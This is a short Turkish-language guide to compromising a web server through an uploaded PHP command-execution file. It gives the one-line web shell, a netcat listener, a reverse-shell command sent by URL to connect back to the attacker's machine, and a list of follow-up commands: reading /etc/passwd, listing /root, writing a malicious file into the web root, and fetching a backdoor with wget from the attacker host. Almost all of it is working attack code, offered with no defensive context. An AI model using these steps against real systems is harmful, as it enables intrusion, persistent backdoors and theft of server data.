Bu saldırı, PHP komut enjeksiyonu kullanarak bir web sunucusuna reverse shell (geri bağlantı) kurar. Saldırgan, hedef sunucuda komut çalıştırarak, kendi bilgisayarına bağlantı sağlar.
Adımlar:
PHP Komut Enjeksiyonu Dosyası: Web sunucusuna şu PHP kodunu içeren bir dosya yükleyin:
<?php system($_GET['cmd']); ?>
Netcat Dinleyici Başlatma: Saldırganın bilgisayarında şu komutla dinleyici başlatılır:
sudo nc -nvlp 1453
Komut Gönderme: Web tarayıcısına şu URL ile komut gönderilir:
http://192.168.238.138/uploads/Cmd.phtml?cmd=n -e /bin/bash 192.168.238.129 1453
Sunucudan Bağlantı Alma: Sunucu, Cmd.phtml dosyasındaki komutu çalıştırarak saldırganın IP adresine geri bağlantı yapar.
Örnek kullanımlar
#!/bin/bash
# Sistem Bilgilerini Görüntüleme
# Komut: uname -a
# URL: http://192.168.238.138/uploads/Cmd.phtml?cmd=uname -a
# Dizin İçeriğini Listelemek
# Komut: ls -la
# URL: http://192.168.238.138/uploads/Cmd.phtml?cmd=ls -la
# Ağ Bağlantılarını Görüntülemek
# Komut: netstat -tuln
# URL: http://192.168.238.138/uploads/Cmd.phtml?cmd=netstat -tuln
# /etc/passwd Dosyasının İçeriğini Görüntülemek
# Komut: cat /etc/passwd
# URL: http://192.168.238.138/uploads/Cmd.phtml?cmd=cat /etc/passwd
# Root Dizinini Listelemek
# Komut: sudo ls /root
# URL: http://192.168.238.138/uploads/Cmd.phtml?cmd=sudo ls /root
# Kötü Niyetli Dosya Yazmak
# Komut: echo 'Malicious Code' > /var/www/html/malicious.html
# URL: http://192.168.238.138/uploads/Cmd.phtml?cmd=echo 'Malicious Code' > /var/www/html/malicious.html
# Arka Kapı (Backdoor) Yüklemek
# Komut: wget http://192.168.238.129/backdoor.php -O /var/www/html/backdoor.php
# URL: http://192.168.238.138/uploads/Cmd.phtml?cmd=wget http://192.168.238.129/backdoor.php -O /var/www/html/backdoor.php